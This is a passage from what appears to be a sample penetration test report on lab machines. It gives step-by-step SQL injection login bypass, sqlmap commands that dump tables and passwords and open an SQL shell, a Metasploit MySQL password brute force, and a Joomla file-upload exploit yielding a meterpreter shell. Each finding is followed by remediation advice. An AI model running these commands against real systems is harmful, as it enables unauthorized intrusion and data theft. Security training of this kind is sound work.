attacker with unauthorized access to sensitive data including, customer data, personally identifiable
information , trade secrets, intellectual property and other sensitive information.
The Xsecurity and moviescope sites are prone to SQL Injections. We confirmed by performing SQL
Injection in their login forms and then running SQLMAP tool to extract all the database
information as well as get a shell where sql server is running.
Exploitation:
Figure 95: IP Address of ENTERTAINMENT: 10.10.0.2

From challenge 1 , we know that the IP Address of ENTERTAINMENT is 10.10.0.2
2. Challenge a: Contact number of Steve:
Visit the url: http://10.10.02/moviescope
Let us try to exploit using SQL Injection:
Type any random string for username and in password type :

81
Kk’ 1=1--
The password field is prone to SQL injection and we are successfully able to login as admin:
Figure 96: Visit http://10.10.0.2/moviescope and SQL Injection on password field

82
Figure 97: Logged as “Admin”
Now click on View Profile tab:
Figure 98: Url Parameter tampering
3. URL parameter tampering

Change the id = 2, 3, 4 in the url as shown in figure 98 to find details of different users
We get Steve's profile for id=4 as shown below:

83
Figure 99: Steve’s profile

Steve contact number is 1-202-509-8421
Get the Database information:
Figure 100: txtpwd parameter to run sqlmap

84
Run sqlmap for moviescope site to get databases names:
Sqlmap –u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd --dbs
Figure 101: sqlmap for moviescope
Figure 102: Databases name
4. Extract tables and users for Xsecurity site:
Visit http://10.10.0.2/xsecurity
Try blind SQL injection for username:

85
Figure 103: Login page for xsecurity site
Figure 104: Login as Smith using blind SQL Injection

We could extract the database name for http://10.10.0.2/xsecurity as Xsecurity using
sqlmap tool as shown in figure 105
Let us try to get the tables and users for xsecurity site. Run the following command in Kali Linux:
sqlmap –u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd -D Xsecurity --tables

86
Figure 105: sqlmap to get table names in Xsecurity database

We got 3 tables as shown in Figure 106:
Figure 106: Tables in Xsecurity database

Now get the column names for Users table:
sqlmap –u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd -D Xsecurity –T Users –
columns

87
Figure 107: Column names in Users table for Xsecurity database

We got the columns username and password.
Let us read them to get username and passwords for Xsecurity
First get the usernames:
sqlmap –u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd -D Xsecurity –T Users -C
username --dump
Figure 108: Usernames in Users table

Let us get Passwords now:
sqlmap –u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd -D Xsecurity –T Users -C
password –dump

88
Figure 109: Passwords in Users table

We got the passwords.
Let us log to xecurity website using these username & password:
Figure 110: Login to xsecurity site using john/john@123

89
Figure 111: Successful login as john

5. Challenge c) Present SQL Server database version :
To get the database version, let us open the shell through sqlmap in Kali Linux machine:
sqlmap -u http://10.10.0.2/moviescope/login.aspx --forms -p txtpwd -D Xsecurity –sql-shell
Figure 112: SQL Server Database version

SQL Server DB version: Microsoft SQL Server 2005
Impact:
The main consequences are:
 Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is
a frequent problem with SQL Injection vulnerabilities.
 Authentication: If poor SQL commands are used to check user names and passwords, it
may be possible to connect to a system as another user with no previous knowledge of the
password.
 Authorization: If authorization information is held in a SQL database, it may be possible to
change this information through the successful exploitation of a SQL Injection vulnerability.
 Integrity: Just as it may be possible to read sensitive information, it is also possible to make
changes or even delete this information with a SQL Injection attack.

90
 SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause
repudiation issues such as voiding transactions or changing balances, allow the complete
disclosure of all data on the system, destroy the data or make it otherwise unavailable, and
become administrators of the database server.
 SQL Injection is very common with PHP and ASP applications due to the prevalence of
older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and
ASP.NET applications are less likely to have easily exploited SQL injections.
 The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to
a lesser extent, defense in depth countermeasures, such as low privilege connections to the
database server and so on. In general, consider SQL Injection a high impact severity.
Result Analysis:
We could successfully login to websites without password and we could also get database, tables,
columns, users, passwords information by using sqlmap tool.
We also performed url parameter tampering to get Steve’s contact details.
SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data used to dynamically construct a SQL query
Recommendations:
To counter SQL injection attacks, you need to:
 Constrain and sanitize input data. Check for known good data by validating for type, length,
format, and range.
 Use type-safe SQL parameters for data access. You can use these parameters with stored
procedures or dynamically constructed SQL command strings. Parameter collections such
as SqlParameterCollection provide type checking and length validation. If you use a
parameters collection, input is treated as a literal value, and SQL Server does not treat it as
executable code. An additional benefit of using a parameters collection is that you can
enforce type and length checks. Values outside of the range trigger an exception. This is a
good example of defense in depth.
 Use an account that has restricted permissions in the database. Ideally, you should only grant
execute permissions to selected stored procedures in the database and provide no direct
table access.
 Avoid disclosing database error information. In the event of database errors, make sure you
do not disclose detailed error messages to the user.
Note Conventional security measures, such as the use of Secure Socket Layer (SSL) and IP Security
(IPSec), do not protect your application from SQL injection attacks.

91
[Challenge 10:] Compromise MySql Database on “ECOMM”

machine and extract table data
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
Imagine, just for a minute, that your web server infrastructure was a castle which you spent lots of
time and resources fortifying. You built high walls, watch towers, retracting bridges, solid iron bars
across the windows, and so on and so forth to keep your enemies out. Now imagine that your
enemy happens to have a copy of the key to the front door! I use this comical analogy to make a
serious point: what good is even the most locked down web server in the world if your enemy can
exploit weak passwords to bypass everything else you’ve secured?
You’ve probably heard this many times before but passwords really are, more often than not, the
weakest link in the security chain. What’s even more worrying is that they are also the forgotten link;
regularly an afterthought for users, web developers or web server admins.
There are multiple ways an attacker can obtain a password (e.g. social engineering, network
intrusion). Discussing these are beyond the scope of this post but, when it comes to web security
and specifically web form authentication, it is important to keep in mind that the most popular form
of attack is a dictionary or brute force attack. This is where the attacker attempts to login to the
password-protected page over and over again using username and password combinations which
they obtain from a pre-populated list of words (referred to as the dictionary).
Exploitation:
From Challenge 1 we know that the IP Address of ECOMM machine is 10.10.0.3:
Figure 113: nbtscan for 10.10.0.x macines
Open ports and services on 10.10.0.3:

92
We can observe that port 3306: mysql is open:
Figure 114: Open ports and services in 10.10.0.3

2. Exploiting mysql vulnerabiltity:
Run msfconsole in Kali Linux and serach for “mysql” exploits:

 msfconsole
 search mysql
 use auxiliary/scanner/mysql/mysql_login
 set USERNAME root
 exploit

93
Figure 115: auxiliary/scanner/mysql/mysql_login metasploit exploit
Figure 116: set USERNAME as root

The credentials "root:test" generated successful login.
Let us try to open database connection using mysql using these credentials:
 mysql –u root –p –h 10.10.0.3
 show databases;
We are successfully logged in to mysql and able to see the databases.

94
Figure 117: Successful login to mysql

There are 5 databases:
i) moviescope database:

95
Figure 118: moviescope database information

ii) queenhotel database
Figure 119: queenhotel database information

96
iii) test database
Figure 120: queenhotel database information: Empty tables
iv) mysql database: default database in mysql

97
Figure 121: mysql database information: Default database

98
Figure 122: mysql database information: user table

v) information_schema database

99
Figure 123: information_schema database information: Default

Impact:
The weak password for mysql database led to the complete compromise of the database.
We could view all the databases and tables data using the “mysql_login” metasploit exploit and get
the SQL prompt. Hence, we got complete control of the mysql databases and could perform any
database operations.

100
Result Analysis:
The MySQL Server is using a weak password. Metasploit “mysql_login” exploit was able to guess
the credentials required to access this resource.
A weak password is short, common, a system default, or something that could be rapidly guessed by
executing a brute force attack using a subset of all possible passwords, such as words in the
dictionary, proper names, words based on the user name or common variations on these themes.
Recommendations:
There are a number of steps you can take to reduce the risks and increase web security.
First and foremost, you should build a strong password. The definition of a strong password varies,
but generally it should have the following properties:
 Be at least 8-10 characters long; ideally longer (especially for administrative accounts)
 Use uppercase and lowercase characters
 Use alpha and numeric characters, including special characters (e.g. !?$£#@%)
 Should not be easily guessable like company names, pets name, etc.
 Not be a word from a common dictionary (e.g. orange, computer, television)
 Not have any part of the username in it
Additionally, you should endeavour to:
 Change the password every 60-90 days
 Not share the password with anyone
 As a web developer, use cryptographic algorithms and salt passwords for password protected
areas of the site
 As a web developer, implement an account lockout method to disable the account after a
number of failed attempts. This will add an extra layer of protection against brute force
attacks.
Another thing you can do is to perform a periodic security audit of your website using a web
vulnerability scanning tool such as Acunetix Web Vulnerability Scanner. Such tools can simulate
password dictionary attacks against pages with web form authentication and highlight weak
passwords, giving you a chance to fix any issues discovered and tighten security before it is too late.
[Challenge 11:] Exploit “RDDept” machine and present hash value
of “RnD NDA.pdf” document
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
The websites which use Joomla are prone to various joomla vulnerabilities if not patched and
updated. In this challenge, we exploit a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by

101
default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module
has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04.
Exploitation:
From challenge 1, we know that IP Address of RDDEPT machine is 172.19.19.9
Figure 124: nbtscan for 172.19.9.xx machine
nmap scan for finding vulnerabilities for RDDEPT machine

102
Figure 125: nmap scan for 172.19.9.xx machine

2. Exploit Joomla vulnerability
We got the URL: http://172.19.19.9/ECSA
Open the Url in Windows 2012 Subnet A machine:

103
Figure 126: http://172.19.19.9/ECSA uses joomla
Let us find metasploit exploit for Joomla. Let us exploit joomla_media_upload_exec in Kali Linux.
 msfconsole
 search joomla
 use exploit/unix/webapp/ joomla_media_upload_exec
 set payload php/meterpreter/bind_tcp
 exploit

104
Figure 127: set options for joomla_media_upload_exploit
Figure 128: Meterpreter session in 10.10.0.3

Exploit ran successfully and we got the meterpreter shell
3. Download RnD NDA.pdf and find its hash value

105
The required document is present at location:\Users\Student\Documents
Figure 129: \Users\Student\Documents\RnD NDA.pdf

Download the document and find its hash:
Figure 130: hash value of “RnD NDA.pdf
Impact:
The vulnerable web-application can be exploited by arbitrary file uploading and remote code
execution.
We could successfully exploit the joomla vulnerability and get the meterpreter session and perform
remote code execution. We could successfully read the sensitive documents like “RnD NDA.pdf”
Result Analysis:
The vulnerability in joomla can lead to remote code execution and hence, can lead to compromise
the entire machine. In this challenge, we could compromise RDDEPT machine.
Recommendations:
- Remove Joomla if not needed
- If needed by the web application, Joomla should be patched for any security
vulnerabilities and updated regularly.

106
Appendixes
Appendix A: References
1. Vulnerability in Server Service Could Allow Remote Code Execution

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
2. APACHE MOD_CGI BASH ENVIRONMENT VARIABLE CODE INJECTION

(SHELLSHOCK)
3. https://www.rapid7.com/db/modules/exploit/multi/http/apache_mod_cgi_bash_env_exec
4. Strong passwords guidelines

https://mediatemple.net/community/products/dv/204644370/strong-password-guidelines
5. SQL Injection
http://www.sqlinjection.net/risks/
6. SQL Injection
https://www.owasp.org/index.php/SQL_Injection
7. Cross-site Scripting
https://support.microsoft.com/en-us/kb/252985
8. WORDPRESS INBOUNDIO MARKETING PHP UPLOAD VULNERABILITY

https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_inboundio_marketing_file
_upload
9. JOOMLA MEDIA MANAGER FILE UPLOAD VULNERABILITY

https://www.rapid7.com/db/modules/exploit/unix/webapp/joomla_media_upload_exec
10. MySQL Server weak password

https://www.acunetix.com/vulnerabilities/web/mysql-server-weak-password
11. Weak Password Vulnerability: More Common than You Think

http://www.acunetix.com/blog/articles/weak-password-vulnerability-common-think/

107
Appendix B: Glossary
Black Box Black Box testing is used when the organization desires to test internal or external network security
Penetration from the perspective of an outsider with no knowledge of the organization, other than that which
Test: is in the public domain and freely available to anyone. The attacker has no advance knowledge of
the organization, except, perhaps, the name of the target. Black box testing most closely simulates
what an organization could expect from an outside attack in that, once any discovered vulnerability
is exploited and access to the network is gained, the attacker continues to exploit a specific
vulnerability as far as possible, with the ultimate goal of obtaining administrative-level access to the
vulnerable machine or extending network control to other machines. Because only the first
successful vulnerability is exploited, other vulnerabilities within the network go untested and may
lead to a false sense of security. Attacks are carried out as covertly as possible. Once the attacks
are observed and reported by the target organization, black box testing ceases. Black box testing is
also referred to as “no knowledge testing.” It is the most unreliable form of penetration testing.
Crystal Box Crystal Box testing is used when the organization desires to test internal or external network security
Penetration Test from the perspective of an attacker with full and complete knowledge of the organization, similar
to the knowledge possessed by an administrator. This knowledge normally includes passwords for
routers, firewalls and IDS Systems, network topology, machine configurations and other
information that an IT administrator would possess. As many discovered vulnerabilities as possible
are exploited within the timeframe specified in the engagement letter. Attacks may be carried out
overtly or covertly, as the organization desires. Crystal box testing provides the most thorough
assessment of the security posture of the network, in that multiple attack avenues are pursued with
detailed knowledge of the organization. Crystal box testing is also referred to as “full knowledge
testing” or “white box testing.”
Grey Box Grey Box testing is used when the organization desires to test internal or external network security
Penetration Test from the perspective of an attacker with only limited knowledge of the organization, similar to the
knowledge possessed by a non-IT employee. This knowledge normally includes machine names,
shared folder names, IP addresses, naming conventions and other information that a normal user
with no special access would know about the target organization. As many discovered
vulnerabilities as possible are exploited within the timeframe specified in the engagement letter.
Attacks may be carried out overtly or covertly, as the organization desires. Grey box testing assures
a more thorough assessment of the security posture of the network, in that several possible attack
avenues are pursued. Grey box testing is also referred to as “partial knowledge testing.”
Internet Foot Internet foot printing uses the Internet to search for information in the public domain that could
Printing assist an attacker in gaining access to the target’s network. While some information placed in the
public domain is required by law, regulation, or to assist in conducting business, excess information
in the public domain could result in an attacker gaining enough knowledge to conduct logical,
physical or social engineering attacks against the target. Expected results of Internet Footprinting
are: location addresses, business hours, telephone and fax numbers, contact names and e-mail
addresses; partners; merger/acquisition news; privacy and security policies in place; links to other
Web servers; employee names and information; networking equipment used; Web pages using input
forms, assigned IP address ranges and Points of Contact, etc.
Penetration Test The objective of penetration testing is to exploit discovered vulnerabilities to demonstrate that
specific vulnerabilities, present in the organization’s network, can be used to compromise network
security. It uses intrusion techniques, identical or similar to methods used by attackers to breach
network security, collect data and elevate the attacker’s privileges within the network. It can also
reveal the extent to which an organization’s security incident response capability is alerted by
observing the organization’s response to attack methodologies.

108
Physical See Social Engineering

Penetration
Testing
Social Also called physical penetration testing. Social Engineering includes “successful or unsuccessful
Engineering attempts to influence a person(s) into either revealing information or acting in a manner that would
result in unauthorized access, unauthorized use, or unauthorized disclosure to/of an information
system, network or data” using human-based or computer based techniques. In other words, using
deception to con someone into providing information or access they would not normally have
provided. It’s the “human side” of breaking into a network and preys on the qualities of human
nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in
trouble. Social engineering can also include the practices of “dumpster diving” (searching the
target’s refuse for useful information) and “shoulder surfing” (obtaining passwords by
surreptitiously watching a user type in their password).
Vulnerability The objective of vulnerability testing is to discover possible attack vectors that can be used to
Assessment compromise the target network. It is a systematic examination of an information system or product
to determine the adequacy of security measures, identify security deficiencies, provide data from
which to predict the effectiveness of proposed security measures, and confirm the adequacy of such
measures after implementation.

109

Penetration Testing

Încărcat de

Informații document

Descriere originală:

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Penetration Testing

Încărcat de

Drepturi de autor:

Formate disponibile

<Tester Name> CONFIDENTIAL Penetration Test Report for

FNB Financial Services

Your Name FNB FINANCIAL SERVICES,

Sample Report CONFIDENTIAL Page |